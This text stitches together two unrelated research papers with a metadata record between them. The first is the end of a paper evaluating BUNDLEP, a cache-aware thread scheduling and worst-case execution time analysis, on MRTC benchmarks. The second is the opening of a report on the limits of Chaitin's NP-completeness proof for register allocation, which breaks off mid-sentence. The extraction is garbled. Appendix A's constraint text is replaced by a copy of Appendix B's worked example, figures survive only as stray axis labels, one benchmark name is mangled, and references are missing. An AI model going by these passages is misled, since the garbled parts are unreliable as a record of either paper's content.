)</td> <td>( 100 )</td> <td>([8, 16, 32])</td> <td>([2, 4, 8, 16])</td> </tr> <tr> <td>( 10 )</td> <td>( 100 )</td> <td>([8, 16, 32])</td> <td>([2, 4, 8, 16])</td> </tr> </tbody> </table> **TABLE I: MIPS 74K Architecture Parameters** Of the 27 MRTC benchmarks, 18 were evaluated. The selection is limited by Heptane’s ability to perform WCET analysis using the \texttt{lp_solve} ILP solver and the 12 gigabytes of RAM available (the complete results are available in the technical report [27]). For each benchmark, Heptane produces a single WCET value for the execution of one thread through the ribbon denoted \( c_{il} \). To compare Heptane’s WCET to BUNDLEP’s WCETO \( \Omega \), the number of threads and context switch costs are incorporated and quantified as a difference \( \Delta_{\omega} = m \cdot (c_{il} + \omega_b) - \Omega \). Similarly, the number of cycles required to execute on the simulator serially is denoted \( E_H \), cycles required for BUNDLEP execution denoted \( E_B \), and the comparison \( \Delta_H = E_H - E_B \). A positive \( \Delta \) value indicates the BUNDLEP approach provides a benefit. Context switch costs are encapsulated in BUNDLEP’s WCETO \( \Omega \), they are not incorporated into \( c_{il} \). Serial execution models threads as jobs of distinct tasks, switching between jobs incurs a task-level context switch cost. A job switch includes more heavyweight operations than a bundle-level context switch, such as exchanging task control blocks instead of thread control blocks. To favor the classical approach, the bundle-level context switch cost \( \omega_b \) is also used as the task-level context switch cost. There are two context switch costs for BUNDLEP: between bundles \( \omega_b \) and between threads \( \omega_t \). To find representative values for both costs, sample programs were written for the target architecture and analyzed using Heptane. Selecting a thread from an array and jumping to a new instruction address took less than 10 cycles. For \( \omega_b \) a precise value would require the implementation of a priority queue, supported by an optimized heap, that could be analyzed by Heptane. The implementation of such a priority queue is beyond the scope of this work. However, a limited set of queue operations were analyzed for removing one of two items taking less than 55 cycles. Since removeMax grows at \( \log_2(m) \) for bundle selection, the context switch costs are set to \( \omega_b = 55 \cdot \log_2(m) \) and \( \omega_t = 10 \). Figures 10a and 10b summarize the results of the evaluation. The y-axis represents the number of benchmarks where BUNDLEP benefits the task. Along the x-axis, the groups separate the architecture parameters which are enumerated by their \( \{B, \ell, \omega\} \). For each group the result is tallied by the number of threads per job, from 1 to 16. There are several interesting observations to be made in Figure 10a. Though BUNDLEP analysis provides a benefit in the majority of cases, it does not always. As the cache size is reduced the number of benchmarks that benefit increases. Similarly, as the number of threads per job increases so do the number of benchmarks that benefit. These trends are due to the number of misses (typically) increasing as the cache size is reduced, or the number of threads increased. BUNDLEP avoids these conflicts or converts them to cache hits. Surprisingly, for a single thread per job BUNDLEP may provide a lower bound – this is likely due to the use of the expanded CFG instead of the conventional CFG used by Heptane’s analysis. The run-time benefit summary in Figure 10b more heavily favors BUNDLEP, with unsurprising trends. For a single thread per job, BUNDLEP provides no benefit since there is no reason to block and incur context switch costs. As the number of threads increases so does the run-time performance. As the cache size decreases, the number of benchmarks that see a run-time performance increases. When compared to the... WCETO benefit, more benchmarks benefit from the run-time behavior than the analysis would suggest. This implies further refinements of the analysis are possible. Across the four dimensions of the evaluation (cache size, BRT, CPI, and number of threads per job), the expectation of BUNDLEP’s benefit will increase as the cache size decreases, increase as the BRT increases, decrease as the CPI increases, and increase as the number of threads per job increase. Many of the benchmarks match these expectations, such as the results for ud found in Figure 11. The evaluation provides further motivation for future improvements in the extraction of CFRs, scheduling mechanism, and bound calculation. Benchmarks with anomalous results highlight the cost of BUNDLEP scheduling, the greater number of context switch costs. This cost must be balanced against the inter-thread cache benefit, which is not always the case. Future work seeks to find a balance in two ways: 1.) ensuring CFRs are of greatest size 2.) developing criteria to permit some cache conflicts when an imbalance exists. These efforts coincide with our ongoing development of a multi-task version of BUNDLEP integrated with the evaluation toolkit. REFERENCES X. ACKNOWLEDGMENTS We would like to express our gratitude to Isabelle Puaut and Damien Hardy for their personal assistance with Heptane and MIPS simulator. Without a freely available, extensible, and reusable platform this work would not have been possible, thank you! APPENDIX A ILP CONSTRAINTS FROM WCETO CONTRIBUTIONS This appendix is dedicated to describing the transformation of equations 1, 2, 3 and the supply of threads into the constraints of the ILP for WCETO calculation. For a CFRG \( R = (N, E, h) \), the objective of the ILP is to maximize: \[ \Omega = \sum_{n \in N} \omega_n(t_n) \] Several variables are added to the ILP which are not present in the formulae. A binary selector variable \( b_n \in \{0, 1\} \) is added for each node, when the value is 1 the node has at least one thread assigned to it. For every edge \( (u, v) \in E \), the variable \( t_{(u,v)} \) represents the number of threads passed from node \( u \) to \( v \). The terminal node of the CFRG is identified as \( z \in N \), having out-degree zero. Two functions are defined for each node. The successor and predecessor functions return the sets given by their names. Both of these functions properly obey the scope of the provided node \( n \). If a false node is provided, the nodes collapsed within it will not be included in the set. If a real node collapsed within a false node is provided the set will include only nodes found within the collapsed node (real or false). **Functions** \[ \text{preds}(n) \triangleq \{u|(u, n) \in E\} \] Set of immediate predecessors of \( n \in N \). \[ \text{succs}(n) \triangleq \{v|(n, v) \in E\} \] Set of immediate successors of \( n \in N \). What follows are the individual constraints generated for each node. To clarify, a top-most false node contributes its WCETO directly to the objective, being a part of each node. To make it easier by considering the memory demand independently of the execution demand. For \( n_0 \), there is no decision four threads are assigned. The memory demand for \( n_0 \) is 400 cycles, and 40 cycles per thread for 560 cycles total. There are no decisions to be made for \( n_1 \) or \( n_3 \), the number of threads assigned to them are determined by the structure of the graph. For threads to be assigned to \( n_4 \) and \( n_5 \), their combined execution and memory demand must be compared to \( n_2 \). For one thread, \( n_2 \) has a total demand of 610 cycles. For one thread, the combined demand for \( n_4 \) and \( n_5 \) is 710 cycles (the demand for interior nodes of \( n_5 \) is 10 cycles per thread. Though not explicitly listed in the figure, this is the reason \( \sum \omega = 20 = 2 \cdot 10 \). The execution demand for a second thread (or third) of \( n_2 \) is 110 cycles, and the combined execution demand for a second thread of \( n_4 \) and \( n_5 \) is also 110 cycles. Any assignment where \( t_2, t_4, \) and \( t_5 \) are greater than or equal to one will result in the same WCETO value. The assignment in Figure 13 has balanced the threads across paths. Table 14 lists the benchmarks evaluated. **Special Case Constraints** - \( t_h \triangleq m \) - The initial node \( h \) must have all \( m \) threads assigned. - \( t_z \triangleq m \) - The terminal node \( z \) must have all \( m \) threads assigned. **APPENDIX B WCETO EXAMPLE** The ILP objective function \( \Omega \), is the sum of the contributions of the CFRs of the CFRG given an assignment of threads per node. Figure 13 illustrates the source of each node’s contribution for four threads \( (m = 4) \). It reuses the structure of Figure 9 with detailed memory and execution demand values that are closer to those found in the evaluation. Fig. 13: CFRG Individual Nodes and ILP Objective When completed, the ILP determines the WCETO bound is 2,680 cycles. Understanding how the bound is calculated is made easier by considering the memory demand independently of the execution demand. For \( n_0 \), there is no decision four threads are assigned. The memory demand for \( n_0 \) is 400 cycles, and 40 cycles per thread for 560 cycles total. There are no decisions to be made for \( n_1 \) or \( n_3 \), the number of threads assigned to them are determined by the structure of the graph. For threads to be assigned to \( n_4 \) and \( n_5 \), their combined execution and memory demand must be compared to \( n_2 \). For one thread, \( n_2 \) has a total demand of 610 cycles. For one thread, the combined demand for \( n_4 \) and \( n_5 \) is 710 cycles (the demand for interior nodes of \( n_5 \) is 10 cycles per thread. Though not explicitly listed in the figure, this is the reason \( \sum \omega = 20 = 2 \cdot 10 \). The execution demand for a second thread (or third) of \( n_2 \) is 110 cycles, and the combined execution demand for a second thread of \( n_4 \) and \( n_5 \) is also 110 cycles. Any assignment where \( t_2, t_4, \) and \( t_5 \) are greater than or equal to one will result in the same WCETO value. The assignment in Figure 13 has balanced the threads across paths. Table 14 lists the benchmarks evaluated. From the MRTC benchmark suite, 18 of the 27 tests were evaluated for their WCET and run-time performance. Benchmarks are treated as one code segment with \( m \) requests for execution per job release. The classical perspective treats each execution as a job of a distinct task, while BUNDLEP views them as threads. From the classical perspective jobs are scheduled serially, one after another. This is compared to BUNDLEP’s thread level scheduling using two metrics. The first \( \Delta_\omega \) is the difference between the WCET of \( m \) serial threads and BUNDLEP’s WCETO. When \( \Delta_\omega \) is positive, BUNDLEP provides an analytical benefit. The second metric is \( \Delta_B \), the difference in the number of cycles required to complete \( m \) threads serially versus BUNDLEP’s scheduling mechanism. A positive \( \Delta_B \) value indicates a shorter run-time under BUNDLEP. Names of each of the benchmarks evaluated are listed in Figure 14. Starting on the next page are the graphical results. Two graphs are given for each benchmark, one to illustrate the WCETO benefit (\( \Delta_\omega \)), and a second for the run-time benefit (\( \Delta_B \)). <table> <thead> <tr> <th>bs</th> <th>bsort100</th> </tr> </thead> <tbody> <tr> <td>crc</td> <td>expint</td> </tr> <tr> <td>fft</td> <td>insertsort</td> </tr> <tr> <td>jfdctint</td> <td>lcdnum</td> </tr> <tr> <td>matmult</td> <td>minver</td> </tr> <tr> <td>ns</td> <td>nsichneu</td> </tr> <tr> <td>qurt</td> <td>select</td> </tr> <tr> <td>simple</td> <td>sqrt</td> </tr> <tr> <td>statemate</td> <td>ud</td> </tr> </tbody> </table> Fig. 14: Benchmarks of MRTC For each benchmark, altering the architecture parameters has the following anticipated effects on the performance of BUNDLEP. In general, as the number of cache lines is increased, the analytical and run-time benefit of BUNDLEP is expected to decrease; since the shared resource BUNDLEP benefits from becomes less scarce. As the number of threads increase, the analytical and run-time benefit of BUNDLE will increase since the use of the cache increases. As the ratio of cache block reload time to instruction execution time \( B : I \) increases so should BUNDLEP’s performance. For many of the benchmarks BUNDLEP performs as expected when varying cache sizes, threads, and CPI. Examples include: bs, bsort100, crc, insertsort, select, qurt, and ud. A highlight of the analysis and run-time benefit is the select benchmark. In the best case BUNDLEP reduces the WCETO by roughly fifty percent, from the serial bound of nearly four million close to two million. At run-time, the observed execution time is roughly two-thirds of the serial version. For a few of the benchmarks: matmult, expint, and ns, BUNDLEP analysis is worse for almost every architecture and thread configuration. For each of these benchmarks the run-time behavior favors BUNDLEP only slightly better than the WCETO analysis. Examining the structure of the CFRG for these benchmarks we find embedded loops with small CFRs. Thus, the benefit of cache sharing is reduced and the penalty of bundle-level and thread-level context switch costs are relatively high. In terms of analysis, the minver benchmark has the most inconsistent results. For instance, comparing the configurations of (100:1, 16) and (100:10, 16) as the number of threads increases the performance of BUNDLEP increases for the former. Yet, in the latter performance decreases, then increases. This benchmark lies on the cusp of analytical benefit and will receive further investigation, in part motivated by the consistent run-time benefit. We find merit in BUNDLEP’s scheduling and analytical approach. Under the best circumstances (100:1, 8) and \( m = 16 \), BUNDLEP provides an analytical benefit for 16 of the 18 benchmarks, and a run-time benefit for 18. For the least favorable configuration (100:10, 32) and \( m = 2 \), BUNDLEP provides an analytical benefit for 9 of 18, and a run-time benefit for 8 of the 18 benchmarks. $\Delta_\omega$ for Benchmark jfdctint $\Delta_B$ for Benchmark jfdctint $\Delta_\omega$ for Benchmark lcdnum $\Delta_B$ for Benchmark lcdnum $\Delta_\omega$ for Benchmark matmult $\Delta_B$ for Benchmark matmult Cycles Architecture (\(B: I, \ell\)) \(\Delta_\omega\) for Benchmark minver \[ \begin{array}{cccc} \text{m} & 1 & 2 & 4 \\ \text{Cycles} & 50000 & 100000 & 150000 \\ \end{array} \] \(\Delta_\omega\) for Benchmark ns \[ \begin{array}{cccc} \text{m} & 1 & 2 & 4 \\ \text{Cycles} & 50000 & 100000 & 150000 \\ \end{array} \] \(\Delta_\omega\) for Benchmark nsichneu \[ \begin{array}{cccc} \text{m} & 1 & 2 & 4 \\ \text{Cycles} & 50000 & 100000 & 150000 \\ \end{array} \] Cycles Architecture (B:I, ℓ) \( \Delta \omega \) for Benchmark qurt \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) \( \Delta B \) for Benchmark qurt \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) Cycles Architecture (B:I, ℓ) \( \Delta \omega \) for Benchmark select \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) \( \Delta B \) for Benchmark select \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) Cycles Architecture (B:I, ℓ) \( \Delta \omega \) for Benchmark simple \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) \( \Delta B \) for Benchmark simple \( m = 1 \quad 2 \quad 4 \quad 8 \quad 16 \) Cycles vs Architecture $(B: I, ℓ)$ $\Delta_\omega$ for Benchmark $\sqrt{m}$ $m = 1$, $2$, $4$, $8$, $16$ $\Delta_B$ for Benchmark $\sqrt{m}$ $m = 1$, $2$, $4$, $8$, $16$ $\Delta_\omega$ for Benchmark $\text{statemate}$ $m = 1$, $2$, $4$, $8$, $16$ $\Delta_B$ for Benchmark $\text{statemate}$ $m = 1$, $2$, $4$, $8$, $16$ $\Delta_\omega$ for Benchmark $\text{ud}$ $m = 1$, $2$, $4$, $8$, $16$ $\Delta_B$ for Benchmark $\text{ud}$ $m = 1$, $2$, $4$, $8$, $16$
{"Source-Url": "http://export.arxiv.org/pdf/1805.12041", "len_cl100k_base": 16011, "olmocr-version": "0.1.53", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 85630, "total-output-tokens": 19297, "length": "2e13", "weborganizer": {"__label__adult": 0.0003407001495361328, "__label__art_design": 0.0004968643188476562, "__label__crime_law": 0.0003609657287597656, "__label__education_jobs": 0.0008454322814941406, "__label__entertainment": 8.785724639892578e-05, "__label__fashion_beauty": 0.00018346309661865232, "__label__finance_business": 0.0003635883331298828, "__label__food_dining": 0.00034499168395996094, "__label__games": 0.0012693405151367188, "__label__hardware": 0.004547119140625, "__label__health": 0.0004343986511230469, "__label__history": 0.00045943260192871094, "__label__home_hobbies": 0.00017547607421875, "__label__industrial": 0.0009059906005859376, "__label__literature": 0.00023376941680908203, "__label__politics": 0.00036263465881347656, "__label__religion": 0.0005898475646972656, "__label__science_tech": 0.130126953125, "__label__social_life": 6.842613220214844e-05, "__label__software": 0.01055908203125, "__label__software_dev": 0.845703125, "__label__sports_fitness": 0.0004227161407470703, "__label__transportation": 0.0009636878967285156, "__label__travel": 0.0002722740173339844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 67630, 0.02665]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 67630, 0.47028]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 67630, 0.87845]], "google_gemma-3-12b-it_contains_pii": [[0, 5262, false], [5262, 11332, null], [11332, 17031, null], [17031, 22863, null], [22863, 26485, null], [26485, 32055, null], [32055, 37932, null], [37932, 43942, null], [43942, 50596, null], [50596, 51807, null], [51807, 57225, null], [57225, 62087, null], [62087, 65873, null], [65873, 65873, null], [65873, 65873, null], [65873, 66091, null], [66091, 66563, null], [66563, 67161, null], [67161, 67630, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5262, true], [5262, 11332, null], [11332, 17031, null], [17031, 22863, null], [22863, 26485, null], [26485, 32055, null], [32055, 37932, null], [37932, 43942, null], [43942, 50596, null], [50596, 51807, null], [51807, 57225, null], [57225, 62087, null], [62087, 65873, null], [65873, 65873, null], [65873, 65873, null], [65873, 66091, null], [66091, 66563, null], [66563, 67161, null], [67161, 67630, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 67630, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 67630, null]], "pdf_page_numbers": [[0, 5262, 1], [5262, 11332, 2], [11332, 17031, 3], [17031, 22863, 4], [22863, 26485, 5], [26485, 32055, 6], [32055, 37932, 7], [37932, 43942, 8], [43942, 50596, 9], [50596, 51807, 10], [51807, 57225, 11], [57225, 62087, 12], [62087, 65873, 13], [65873, 65873, 14], [65873, 65873, 15], [65873, 66091, 16], [66091, 66563, 17], [66563, 67161, 18], [67161, 67630, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 67630, 0.03733]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
ea5d112303c62deb85b82817a193504591d3c748
Register allocation: what does Chaitin’s NP-completeness proof really prove? Florent Bouchez, Alain Darte, Fabrice Rastello To cite this version: HAL Id: hal-02102286 https://hal-lara.archives-ouvertes.fr/hal-02102286 Submitted on 17 Apr 2019 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. Register Allocation: What does Chaitin’s NP-completeness Proof Really Prove? Florent Bouchez Alain Darte Fabrice Rastello March 2006 Research Report N° 2006-13 Register Allocation: What does Chaitin’s NP-completeness Proof Really Prove? Florent Bouchez, Alain Darte, and Fabrice Rastello March 2006 Abstract Register allocation is one of the most studied problem in compilation. It is considered as an NP-complete problem since Chaitin, in 1981, showed that assigning temporary variables to \( k \) machine registers amounts to color, with \( k \) colors, the interference graph associated to variables and that this graph can be arbitrary, thereby proving the NP-completeness of the problem. However, this original proof does not really show where the complexity comes from. Recently, the re-discovery that interference graphs of SSA programs can be colored in polynomial time raised the question: Can we exploit SSA to perform register allocation in polynomial time, without contradicting Chaitin’s NP-completeness result? To address such a question, we revisit Chaitin’s proof to better identify the interactions between spilling (load/store insertion), coalescing/splitting (moves between registers), critical edges (a property of the control-flow graph), and coloring (assignment to registers). In particular, we show when it is easy to decide if temporary variables can be assigned to \( k \) registers or if some spilling is necessary. The real complexity comes from critical edges, spilling, and coalescing, which are addressed in our other reports. Keywords: Register allocation, SSA form, chordal graph, NP-completeness, critical edge. Résumé L’allocation de registres est l’un des problèmes les plus étudiés en compilation. On le considère en général NP-complet depuis que Chaitin, en 1981, a montré qu’affecter des variables temporaires à \( k \) registres physiques revient à colorier avec \( k \) couleurs le graphe d’interférences associé aux variables et que ce graphe peut être quelconque. En revanche, cette démonstration ne révèle pas vraiment d’où vient la complexité. Récemment, la re-découverte que les graphes d’interférence des programmes SSA peuvent être coloriés en temps polynomial a conduit à la question : peut-on exploiter la forme SSA pour faire de l’allocation de registres en temps polynomial sans contredire la preuve de Chaitin ? Pour répondre à ce genre de questions, nous revisitions la démonstration de Chaitin pour mieux identifier les interactions entre le “spilling” (insertion de store/load), le “coalescing”/”splitting” (moves entre registres), la présence d’arcs critiques (une propriété du graphe de flot de contrôle) et le coloriage proprement dit (affectation aux registres). En particulier, nous montrons quand il est facile de décider si des variables temporaires peuvent être affectées à \( k \) registres ou si du “spilling” est nécessaire. La vraie complexité du problème d’allocation de registres provient de la présence d’arcs critiques, du “spilling” et du “coalescing”, problèmes que nous considérons dans nos autres rapports. Mots-clés: Allocation de registres, forme SSA, graphe triangulé, NP-complétude, arc critique. Register Allocation: What does Chaitin’s NP-completeness Proof Really Prove? Florent Bouchez, Alain Darte, and Fabrice Rastello 13th March 2006 Abstract Register allocation is one of the most studied problem in compilation. It is considered as an NP-complete problem since Chaitin, in 1981, showed that assigning temporary variables to \( k \) machine registers amounts to color, with \( k \) colors, the interference graph associated to variables and that this graph can be arbitrary, thereby proving the NP-completeness of the problem. However, this original proof does not really show where the complexity comes from. Recently, the re-discovery that interference graphs of SSA programs can be colored in polynomial time raised the question: Can we exploit SSA to perform register allocation in polynomial time, without contradicting Chaitin’s NP-completeness result? To address such a question, we revisit Chaitin’s proof to better identity the interactions between spilling (load/store insertion), coalescing/splitting (moves between registers), critical edges (a property of the control-flow graph), and coloring (assignment to registers). In particular, we show when it is easy to decide if temporary variables can be assigned to \( k \) registers or if some spilling is necessary. The real complexity comes from critical edges, spilling, and coalescing, which are addressed in our other reports. 1 Introduction Register allocation is one of the most studied problem in compilation. Its goal is to find a way to map the temporary variables used in a program into physical memory locations (either main memory or machine registers). Accessing a register is much faster than accessing memory, therefore one tries to use registers as much as possible. Of course, this is not always possible, thus some variables must be transfer (“spilled”) to and from memory. This has a cost, the cost of load and store operations, that should be avoided as much as possible. Classical approaches are based on fast graph coloring algorithms (sometimes combined with techniques dedicated to basic blocks). A widely-used algorithm is iterated register coalescing proposed by Appel and George [12], a modified version of previous developments by Chaitin [6, 5], and Briggs et al. [3]. In these heuristics, spilling, coalescing (removing register-to-register moves), and coloring (assigning a variable to a register) are done in the same framework. Priorities among these transformations are done implicitly with cost functions. Splitting (adding register-to-register moves) can also be integrated in this framework. Such techniques are well-established and used in any optimizing compiler. However, there are at least four reasons to revisit these approaches. 1. Today’s processors are now much faster than in the past, especially faster than when Chaitin developed his first heuristic (in 1981). Some algorithms not considered in the past, because they were too time-consuming, can be good candidates today. 2. For some critical applications, especially in embedded computing, industrial compilers are ready to accept longer compilation times if the final code gets improved. 3. The increasing cost of a memory access compared to a register access suggests that it is maybe better now to focus on heuristics that give more importance to spilling cost minimization, possibly at the price of additional register-to-register moves, in other words, heuristics that consider the trade-off spilling/coalescing as unbalanced. 4. There are many pitfalls and folk theorems, concerning the complexity of the register allocation problem, that need to be clarified. This last point is particularly interesting to note. In 1981, Chaitin [6] showed that allocating variables of a program to \( k \) registers amounts to color with \( k \) colors the corresponding interference graph (two variables interfere if they are simultaneously live). As he was able to produce a code corresponding to an arbitrary interference graph and because graph coloring is NP-complete [11, Problem GT4], heuristics have been used for everything: spilling, coalescing, splitting, coloring, etc. Except in a few papers where authors are more careful, the previous argument (register allocation is graph coloring, therefore it is NP-complete) is one of the first sentences of any paper on register allocation. This way of presenting Chaitin’s proof can make the reader (researcher or student) believe more than what this proof actually shows. In particular, it is in the common belief that, when no instruction scheduling is allowed, deciding if some spilling is necessary to allocate variables to \( k \) registers is NP-complete. This is not what Chaitin proves. We will even show that this particular problem is not NP-complete except for a few particular cases (we will make clear which one), which is maybe a folk theorem too. Actually, going from register allocation to graph coloring is just a way of modeling the problem, but it is not an equivalence. In particular, this model does not take into account the fact that a variable can be moved from a register to another one (splitting), of course at some cost, but only the cost of a move instruction (which is often better than a spill). Until very recently, only a few authors tried to address the complexity of register allocation in more details. Maybe the most interesting complexity results are those of Liberatore et al. [16, 9], who analyze the reasons why optimal spilling is hard for local register allocation (i.e., register allocation for basic blocks). In brief, for basic blocks, the coloring phase is of course easy (the interference graph is an interval graph) but deciding which variable to spill and where is difficult (when stores and loads have nonzero costs). We completed this study for various models of spill cost in [2]. Today, most compilers go through an intermediate code representation, the (strict) SSA form (static single assignment) [7], which makes many code optimizations simpler. In such a code, each variable is defined textually only once and is alive only along the dominance tree associated to the control-flw graph. Some so-called \( \phi \) functions are used to transfer values along the control flw not covered by the dominance tree. The consequence is that the interference graph of such a code is, again, not arbitrary: it is a chordal graph, therefore easy to color. Furthermore, it can be colored with \( k \) colors if and only Maxlive \( \leq k \) where Maxlive is the maximal number of variables simultaneously live. What does this property imply? One can imagine to decompose the register allocation problem into two phases. The first phase (also called allocation in [16]) decides what values are spilled and where, so as to get to a code where Maxlive ≤ k. A second phase of coloring (called register assignment in [16]) maps variables to registers, possibly removing (i.e., coalescing) or introducing (i.e., splitting) move instructions (also called shuffle code in [17]). Considering that loads and stores are more expensive than moves, such an approach is worth exploring. This is the approach advocated by Appel and George [1] and, more recently, in [4, 2, 14]. The fact that interference graphs of strict SSA programs are chordal is well-known (if one makes the connection between graph theory and SSA form). Indeed, a theorem of Walter (1972), Gavril (1974), and Buneman (1974) (see [13, Theorem 4.8]) shows that an interference graph is chordal if and only if it is the interference graph of a family of subtrees (here the live ranges of variables) of a tree (here the dominance tree). Furthermore, maximal cliques correspond to program points. We re-discovered this property in 2002 when teaching to students that register allocation is indeed in general NP-complete but certainly not just because graph coloring is NP-complete. Independently, Brisk et al. [4], Perreira and Palsberg [18], and Hack et al. [14] made the same observation. A direct proof of the chordality property for strict SSA programs can be given, see for example [2, 14]. Recent work has been done on how to go out of SSA [15, 21, 20] and remove φ functions, which are not machine code. How to avoid permutations of colors at φ points is also addressed in [14]. These work combined with the idea of spilling before coloring so that Maxlive ≤ k has led Perreira and Palsberg [19] to wonder where the NP-completeness of Chaitin’s proof (apparently) disappeared: “Can we do polynomial-time register allocation by first transforming the program to SSA form, then doing linear-time register allocation for the SSA form, and finally doing SSA elimination while maintaining the mapping from temporaries to registers?” (all this when Maxlive ≤ k of course, otherwise some spilling needs to be done). They show that the answer is no, the problem is NP-complete. The NP-completeness proof of Perreira and Palsberg is interesting, but it does not completely answer the question. It shows that if we choose the splitting points a priori (in particular as φ points), then it is NP-complete to choose the right colors. However, there is no reason to fix these particular split points. We show in this paper that, when we can choose the split points, when we are free to add program blocks so as to remove critical edges (as this is often done), when Maxlive ≤ k, then it is in general easy to decide if and how we can assign variables to registers without spilling. More generally, the goal of this paper is to discuss the implications of Chaitin’s proof (and what it does not imply) concerning the interactions between spilling, splitting, coalescing, critical edges, and coloring. In Section 2, we first reproduce Chaitin’s proof and analyze it more carefully. The proof shows that when the control-fbw graph has critical edges, which we are not allowed to remove with additional blocks, then it is NP-complete to decide whether k registers are enough, even if splitting variables is allowed. In Section 3, we address the same question as Perreira and Palsberg in [19]: we show that Chaitin’s proof can easily be extended to show that, when the graph has no critical edge but if splitting points are fixed (at entry and exit of basic blocks), the problem remains NP-complete. In Section 4, we show, again with a slight variation of Chaitin’s proof, that even if we can split variables wherever we want, the problem remains NP-complete, but only when there are machine instructions that can create two new variables at a time. However, in this case, it is more likely that the architecture can also perform register swap and then k registers are enough if and only if Maxlive ≤ k. Finally, we show that it is also easy to decide if k registers are enough when only one variable can be created at a given time (as in traditional assembly code representation). Therefore, this study shows that the NP-completeness of register allocation is not due to the coloring phase (as a misinterpretation of Chaitin’s proof may suggest), but is due to the presence of critical edges or not, and to the optimization of spilling costs and coalescing costs. 2 Direct consequences of Chaitin’s proof Let us look at Chaitin’s NP-completeness proof again. The proof is by reduction from graph coloring [11, Problem GT4]: Given an undirected graph \( G = (V, E) \) and an integer \( k \), can we color the graph with \( k \) colors, i.e., can we define, for each vertex \( v \in V \), a color \( c(v) \) in \( \{1, \ldots, k\} \) such that \( c(v) \neq c(u) \) for each edge \( (u, v) \in E \)? The problem is NP-complete if \( G \) is arbitrary, even for a fixed \( k \geq 3 \). For the reduction, Chaitin creates a program with \( |V|+1 \) variables, one for each vertex \( u \in V \) and an additional variable \( x \), and the following structure: - For each \((u, v) \in E\), there is a block \( B_{uv} \) that defines \( u \), \( v \), and \( x \). - For each \( u \in V \), there is a block \( B_u \) that reads \( u \) and \( x \), and returns a new value. - Each block \( B_{uv} \) is a direct predecessor in the control-fbw graph of the blocks \( B_u \) and \( B_v \). - An entry block switches to all blocks \( B_{uv} \). Figure 1 shows the program associated to a cycle of length 4, with edges \((a, b)\), \((a, c)\), \((b, d)\), and \((c, d)\). This is also the example used in [19]. ![Diagram](image) **Figure 1:** The program associated to a cycle of length 4. It is clear that the interference graph associated to such a program is the graph \( G \) plus a vertex for variable \( x \) with an edge \((u, x)\) for each \( u \in V \) (thus this new vertex must use an extra color). If one interprets a register as a color then \( G \) is \( k \)-colorable if and only if each variable can be assigned to a unique register for a total of at most \( k + 1 \) registers. This is what Chaitin proved, nothing less, nothing more: for such programs, deciding if one can assign the variables, this way, to \( k \geq 4 \) registers is thus NP-complete. Chaitin’s proof, at least in its original interpretation, does not address the possibility of splitting the live range of a variable (set of program points where the variable is live \(^1\)). Each vertex of the interference graph represents the complete live range as an atomic object, in other words, it is assumed that one variable must always reside in the same register. The fact that the register allocation problem is modeled through the interference graph loses information on the program itself and the exact location of interferences (this is a well-known fact, which led to many different heuristics). This raises the question: What if we allow to split live ranges? Consider Figure 1 again and a particular variable, for example \( a \). In block \( B_a \), variable \( a \) is needed for the instruction ‘return \( a + x \)’, and this value can come from blocks \( B_{a,b} \) and \( B_{a,c} \). Therefore, even if we split the live range of \( a \) in block \( B_a \) before it is used, some register must contain the value of \( a \) both at the exit of blocks \( B_{a,b} \) and \( B_{a,c} \). The same is true for all other variables. In other words, if we consider the possible copies live at exit of blocks of type \( B_{u,v} \) and at entry of blocks of type \( B_v \), we get the same interference graph \( G \) for the copies. Therefore, the problem remains NP-complete even if we allow live range splitting. Splitting live ranges does not help here because, in the general case, the control-fbw edges from \( B_{u,v} \) to \( B_u \) are critical edges, i.e., they go from a block with more than one successor to a block with more than one predecessor. This forces the live range of a copy to span more than one edge, leading to the well-known notion of web. All copies of a given variable \( a \) are part of the same web and must be assigned the same color. In general, defining precisely what is colored is important as the subtle title of Cytron and Ferrante’s paper “What’s in a name?” pointed out \(^8\). To conclude this section, we can interpret Chaitin’s original proof as follows. It shows that it is NP-complete to decide if the variables of an arbitrary program can be assigned to \( k \) registers, even if live range splitting is allowed, but only when the program has critical edges that we are not allowed to remove (i.e., we cannot change the structure of the control-fbw graph and add new blocks). In the following section, we consider the case of programs with no critical edges. The case of programs with some critical edges with a particular structure will be addressed in another report. ### 3 SSA-like programs and fixed splitting points In \(^{19}\), Ferreira and Palsberg pointed out that the construction of Chaitin (as done in Figure 1) is not enough to prove anything about register allocation through SSA. Indeed, to assign variables to registers for programs built as in Section 2, one just have to add extra blocks (where out-of-SSA code is traditionally inserted) and to perform some register-to-register moves in these blocks. Any such program can now be allocated 